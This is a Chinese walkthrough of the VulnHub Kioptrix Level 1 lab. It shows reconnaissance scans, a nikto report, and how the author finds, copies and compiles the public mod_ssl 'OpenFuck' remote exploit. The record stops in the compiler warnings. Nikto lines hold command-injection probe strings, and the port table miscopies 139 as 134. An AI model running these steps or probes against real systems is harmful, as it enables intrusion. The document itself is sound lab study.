vuInhub靶场实战系列--Kioptrix Level #1

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。

目录

  • 免责声明
  • 前言
  • 一、环境配置
    • 1.1 靶机信息
    • 1.2 靶场配置
  • 二、信息收集
    • 2.1 主机发现
    • 2.2 端口扫描
      • 2.2.1 masscan
      • 2.2.2 nmap
    • 2.3 指纹识别
    • 2.4 目录扫描
      • 2.4.1 dirb
      • 2.4.2 dirsearch
      • 2.4.3 gobuster
    • 2.5 漏洞发现
      • 2.5.1 nikto漏洞搜索
      • 2.5.2 searchsploit漏洞搜索
  • 三、渗透测试
    • 3.1 下载47080.c
    • 3.2 查看47080.c
    • 3.3 环境安装
    • 3.4 编译脚本
    • 3.5 执行脚本
    • 3.6 补充
      • 3.6.1 下载ptrace-kmod.c
      • 3.6.2 kali开启http服务
      • 3.6.3 靶机下载ptrace-kmod.c
      • 3.6.4 再次执行脚本
  • 渗透总结
  • 参考文章


前言

今日测试内容渗透Kioptrix Level #1靶机:

Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。
本文将进行Kioptrix Level #1靶机渗透测试,内容包括主机扫描、目录扫描、漏洞发现、linux内核提权等内容。


一、环境配置

1.1 靶机信息

官方链接https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
发布日期2010年2月17日
靶场大小186MB
作者Kioptrix
系列Kioptrix
难度★☆☆☆☆

1.2 靶场配置

渗透测试环境配置,请参考作者前面的内容,不再赘述:

  • vuInhub靶场实战系列-DC-2实战:https://editor.csdn.net/md/?articleId=139026849
  • 特别说明:在还没有开启靶机的时候,修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkName = “Nat”
    nat模式

二、信息收集

2.1 主机发现

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.164	00:0c:29:e1:92:af	VMware, Inc.
192.168.6.254	00:50:56:e4:d2:90	VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.403 seconds (106.53 hosts/sec). 4 responded

获得靶机信息:
IP地址:192.168.6.164
MAC地址:00:0c:29:e1:92:af

2.2 端口扫描

2.2.1 masscan

┌──(root㉿kali)-[/home/kali]
└─# masscan --rate=10000 --ports 0-65535 192.168.6.164
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-06-08 10:34:53 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 111/tcp on 192.168.6.164                                  
Discovered open port 22/tcp on 192.168.6.164                                   
Discovered open port 80/tcp on 192.168.6.164                                   
Discovered open port 1024/tcp on 192.168.6.164                            

开放端口:111、22、80、1024

2.2.2 nmap

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptix_Level#1 192.168.6.164 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-08 06:37 EDT
Nmap scan report for 192.168.6.164
Host is up (0.0041s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: dMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-06-08T10:40:24+00:00; +1m53s from scanner time.
|_http-title: 400 Bad Request
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:E1:92:AF (VMware)

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m52s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.68 seconds
                                                                                

综上所述,开放端口如下:

端口服务
22ssh服务(OpenSSH 2.9p2)
80http服务(Apache httpd 1.3.20 )
111rpcbind服务(RPC #100000)
134netbios-ssn Samba smbd (workgroup: dMYGROUP)
443ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024status 1 (RPC #100024)

2.3 指纹识别

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.164
WhatWeb report for http://192.168.6.164
Status    : 200 OK
Title     : Test Page for the Apache Web Server on Red Hat Linux
IP        : 192.168.6.164
Country   : RESERVED, ZZ

Summary   : Apache[1.3.20][mod_ssl/2.8.4], Email[webmaster@example.com], HTTPServer[Red Hat Linux][Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b], OpenSSL[0.9.6b]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 1.3.20 (from HTTP Server Header)
	Module       : mod_ssl/2.8.4
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ Email ]
	Extract email addresses. Find valid email address and 
	syntactically invalid email addresses from mailto: link 
	tags. We match syntactically invalid links containing 
	mailto: to catch anti-spam email addresses, eg. bob at 
	gmail.com. This uses the simplified email regular 
	expression from 
	http://www.regular-expressions.info/email.html for valid 
	email address matching. 

	String       : webmaster@example.com

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	OS           : Red Hat Linux
	String       : Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b (from server string)

[ OpenSSL ]
	The OpenSSL Project is a collaborative effort to develop a 
	robust, commercial-grade, full-featured, and Open Source 
	toolkit implementing the Secure Sockets Layer (SSL v2/v3) 
	and Transport Layer Security (TLS v1) protocols as well as 
	a full-strength general purpose cryptography library. 

	Version      : 0.9.6b
	Website     : http://www.openssl.org/

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Sat, 08 Jun 2024 10:48:57 GMT
	Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
	Last-Modified: Thu, 06 Sep 2001 03:12:46 GMT
	ETag: "8805-b4a-3b96e9ae"
	Accept-Ranges: bytes
	Content-Length: 2890
	Connection: close
	Content-Type: text/html

结果展示

2.4 目录扫描

2.4.1 dirb

┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.164

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun  8 06:50:06 2024
URL_BASE: http://192.168.6.164/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.6.164/ ----
+ http://192.168.6.164/~operator (CODE:403|SIZE:273)                                                                                                                                                           
+ http://192.168.6.164/~root (CODE:403|SIZE:269)                                                                                                                                                               
+ http://192.168.6.164/cgi-bin/ (CODE:403|SIZE:272)                                                                                                                                                            
+ http://192.168.6.164/index.html (CODE:200|SIZE:2890)                                                                                                                                                         
==> DIRECTORY: http://192.168.6.164/manual/                                                                                                                                                                    
==> DIRECTORY: http://192.168.6.164/mrtg/                                                                                                                                                                      
==> DIRECTORY: http://192.168.6.164/usage/                                                                                                                                                                     
                                                                                                                                                                                                               
---- Entering directory: http://192.168.6.164/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                               
---- Entering directory: http://192.168.6.164/mrtg/ ----
+ http://192.168.6.164/mrtg/index.html (CODE:200|SIZE:17318)                                                                                                                                                   
                                                                                                                                                                                                               
---- Entering directory: http://192.168.6.164/usage/ ----
+ http://192.168.6.164/usage/index.html (CODE:200|SIZE:3704)                                                                                                                                                   
                                                                                                                                                                                                               
-----------------
END_TIME: Sat Jun  8 06:50:47 2024
DOWNLOADED: 13836 - FOUND: 6

2.4.2 dirsearch

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.164 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.6.164/_24-06-08_06-51-46.txt

Target: http://192.168.6.164/

[06:51:46] Starting: 
[06:51:50] 403 -  275B  - /.ht_wsr.txt                                      
[06:51:50] 403 -  278B  - /.htaccess.bak1                                   
[06:51:50] 403 -  278B  - /.htaccess.orig                                   
[06:51:50] 403 -  279B  - /.htaccess_extra
[06:51:50] 403 -  276B  - /.htaccessBAK                                     
[06:51:50] 403 -  280B  - /.htaccess.sample                                 
[06:51:50] 403 -  278B  - /.htaccess.save
[06:51:50] 403 -  268B  - /.htm
[06:51:50] 403 -  276B  - /.htaccess_sc                                     
[06:51:50] 403 -  277B  - /.htaccessOLD2
[06:51:50] 403 -  278B  - /.htaccess_orig
[06:51:50] 403 -  276B  - /.htaccessOLD
[06:51:50] 403 -  269B  - /.html
[06:51:50] 403 -  278B  - /.htpasswd_test                                   
[06:51:50] 403 -  275B  - /.httr-oauth
[06:51:50] 403 -  274B  - /.htpasswds                                       
[06:52:13] 403 -  272B  - /cgi-bin/                                         
[06:52:21] 403 -  268B  - /doc/                                             
[06:52:21] 403 -  283B  - /doc/html/index.html                              
[06:52:21] 403 -  283B  - /doc/en/changes.html                              
[06:52:23] 403 -  272B  - /doc/api/                                         
[06:52:23] 403 -  282B  - /doc/stable.version                               
[06:52:39] 301 -  294B  - /manual  ->  http://127.0.0.1/manual/             
[06:52:42] 200 -   17KB - /mrtg/                                            
[06:53:10] 200 -   27B  - /test.php                                         
[06:53:14] 301 -  293B  - /usage  ->  http://127.0.0.1/usage/               
[06:53:24] 403 -  273B  - /~operator                                        
[06:53:24] 403 -  269B  - /~root                                            
                                                                             
Task Completed

2.4.3 gobuster

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.6.164 -t 30
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.6.164
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.164/index.html           (Status: 200) [Size: 2890]
http://192.168.6.164/.html                (Status: 403) [Size: 269]
http://192.168.6.164/test.php             (Status: 200) [Size: 27]
http://192.168.6.164/manual               (Status: 301) [Size: 294] [--> http://127.0.0.1/manual/]
http://192.168.6.164/usage                (Status: 301) [Size: 293] [--> http://127.0.0.1/usage/]
http://192.168.6.164/mrtg                 (Status: 301) [Size: 292] [--> http://127.0.0.1/mrtg/]
http://192.168.6.164/.html                (Status: 403) [Size: 269]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                

综上所述,获得一些目录:
http://192.168.6.164/index.html
http://192.168.6.164/test.php
http://192.168.6.164/manual/
http://192.168.6.164/usage/
http://192.168.6.164/mrtg/

2.5 漏洞发现

2.5.1 nikto漏洞搜索

┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.6.164
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.6.164
+ Target Hostname:    192.168.6.164
+ Target Port:        80
+ Start Time:         2024-06-08 07:16:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /test.php: This might be interesting.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2024-06-08 07:18:57 (GMT-4) (133 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


获得以下信息

CVEURL
CVE-2003-1418http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
CVE-2006-3918http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
CVE-2001-0835http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835

2.5.2 searchsploit漏洞搜索

┌──(root㉿kali)-[/home/kali]
└─# searchsploit mod_ssl 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                                                                                               | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                                                                                    | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                                          | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                                                                    | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                                                                    | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                                                                                  | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

这一个payload可以利用:
unix/remote/47080.c


三、渗透测试

3.1 下载47080.c

┌──(root㉿kali)-[/home/kali]
└─# searchsploit -m 47080.c
  Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
      URL: https://www.exploit-db.com/exploits/47080
     Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
    Codes: CVE-2002-0082, OSVDB-857
 Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/47080.c

3.2 查看47080.c

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# cat 47080.c            
/*
 * OF version r00t VERY PRIV8 spabam
 * Version: v3.0.4
 * Requirements: libssl-dev    ( apt-get install libssl-dev )
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 * objdump -R /usr/sbin/httpd|grep free to get more targets
 * #hackarena irc.brasnet.org
 * Note: if required, host ptrace and replace wget target
 */
 ...

展示了使用说明

3.3 环境安装

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# sudo apt-get install libssl-dev
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  cython3 debtags fonts-noto-color-emoji fonts-roboto-slab gir1.2-gtksource-3.0 gir1.2-javascriptcoregtk-4.0 gir1.2-soup-2.4 gir1.2-webkit2-4.0 kali-debtags libadwaita-1-0 libappstream5 libarmadillo10
  libatk-adaptor libatk1.0-data libavfilter7 libavformat58 libblockdev-crypto2 libblockdev-fs2 libblockdev-loop2 libblockdev-part-err2 libblockdev-part2 libblockdev-swap2 libblockdev-utils2 libblockdev2
  libcbor0.8 libcfitsio9 libcharls2 libclang-cpp14 libev4 libexporter-tiny-perl libflac8 libfmt8 libgdal30 libgeos3.10.2 libgssdp-1.2-0 libgupnp-1.2-1 libgupnp-igd-1.0-4 libhttp-server-simple-perl
  liblist-moreutils-perl liblist-moreutils-xs-perl libllvm12 libllvm14 liblttng-ust-ctl4 liblttng-ust0 libmms0 libncurses5 libnfs13 libnginx-mod-http-geoip libnginx-mod-http-image-filter
  libnginx-mod-http-xslt-filter libnginx-mod-mail libnginx-mod-stream libnginx-mod-stream-geoip libnsl-dev libofa0 libperl5.32 libpoppler102 libpostproc55 libproj22 libprotobuf23 libpython3.10-minimal
  libpython3.10-stdlib libpython3.9-dev librtlsdr0 libsoup-gnome2.4-1 libspatialite7 libsrt1.4-gnutls libstemmer0d libsuperlu5 libswscale5 libtbb2 libtinfo5 libtirpc-dev libucl1 libwebsockets16 libxmlb2
  libyara8 llvm-14 llvm-14-dev llvm-14-linker-tools llvm-14-runtime llvm-14-tools lua-lpeg nginx-core openjdk-11-jre openjdk-11-jre-headless perl-modules-5.32 php8.1-mysql pwgen
  python-mpltoolkits.basemap-data python-pastedeploy-tpl python3-advancedhttpserver python3-backcall python3-boltons python3-cairo-dev python3-commonmark python3-debian python3-geoip2 python3-geojson
  python3-graphene python3-graphene-sqlalchemy python3-graphql-core python3-graphql-relay python3-icalendar python3-ipaddr python3-jaraco.classes python3-jdcal python3-llvmlite python3-marshmallow-enum
  python3-maxminddb python3-mistune python3-mpltoolkits.basemap python3-pickleshare python3-pip python3-promise python3-pyatspi python3-pypdf2 python3-pyproj python3-pyshp python3-requests-file
  python3-requests-toolbelt python3-rule-engine python3-rx python3-singledispatch python3-smoke-zephyr python3-speaklater python3-unicodecsv python3-wheel python3.10 python3.10-minimal python3.9
  python3.9-dev python3.9-minimal ruby2.7 ruby2.7-dev zenity zenity-common
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  libssl-doc
The following NEW packages will be installed:
  libssl-dev
0 upgraded, 1 newly installed, 0 to remove and 1100 not upgraded.
Need to get 2,699 kB of archives.
After this operation, 14.7 MB of additional disk space will be used.
Get:1 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 libssl-dev amd64 3.2.1-3 [2,699 kB]
Fetched 2,699 kB in 4s (637 kB/s)       
Selecting previously unselected package libssl-dev:amd64.
(Reading database ... 371282 files and directories currently installed.)
Preparing to unpack .../libssl-dev_3.2.1-3_amd64.deb ...
Unpacking libssl-dev:amd64 (3.2.1-3) ...
Setting up libssl-dev:amd64 (3.2.1-3) ...

依赖环境安装成功。

3.4 编译脚本

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# gcc -o OpenFuck 47080.c -lcrypto
47080.c: In function ‘read_ssl_packet’:
47080.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  534 |                 RC4(ssl->rc4_read_key, rec_len, buf, buf);
      |                 ^~~
In file included from 47080.c:26:
/usr/include/openssl/rc4.h:37:28: note: declared here
   37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
      |                            ^~~
47080.c: In function ‘send_ssl_packet’:
47080.c:583:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  583 |                 MD5_Init(&ctx);
      |                 ^~~~~~~~
In file included from 47080.c:27:
/usr/include/openssl/md5.h:49:27: note: declared here
   49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
      |                           ^~~~~~~~
47080.c:584:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  584 |                 MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:585:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  585 |                 MD5_Update(&ctx, rec, rec_len);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:586:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  586 |                 MD5_Update(&ctx, &seq, 4);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:587:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  587 |                 MD5_Final(p, &ctx);
      |                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
   51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
      |                           ^~~~~~~~~
47080.c:594:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  594 |                 RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
      |                 ^~~
/usr/include/openssl/rc4.h:37:28: note: declared here
   37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
      |                            ^~~
47080.c: In function ‘send_client_master_key’:
47080.c:748:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  748 |         if (EVP_PKEY_get1_RSA(pkey) == NULL) {
      |         ^~
In file included from /usr/include/openssl/x509.h:29,
                 from /usr/include/openssl/ssl.h:32,
                 from 47080.c:21:
/usr/include/openssl/evp.h:1356:16: note: declared here
 1356 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
      |                ^~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘RSA_public_encrypt’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
      |         ^~~~~~~~~~~~~~~~~~~~
In file included from /usr/include/openssl/x509.h:36:
/usr/include/openssl/rsa.h:293:5: note: declared here
  293 | int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,
      |     ^~~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
      |         ^~~~~~~~~~~~~~~~~~~~
/usr/include/openssl/evp.h:1356:16: note: declared here
 1356 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
      |                ^~~~~~~~~~~~~~~~~
47080.c: In function ‘generate_key_material’:
47080.c:791:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  791 |                 MD5_Init(&ctx);
      |                 ^~~~~~~~
/usr/include/openssl/md5.h:49:27: note: declared here
   49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
      |                           ^~~~~~~~
47080.c:793:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  793 |                 MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:794:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  794 |                 MD5_Update(&ctx,&c,1);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:796:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  796 |                 MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:797:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  797 |                 MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
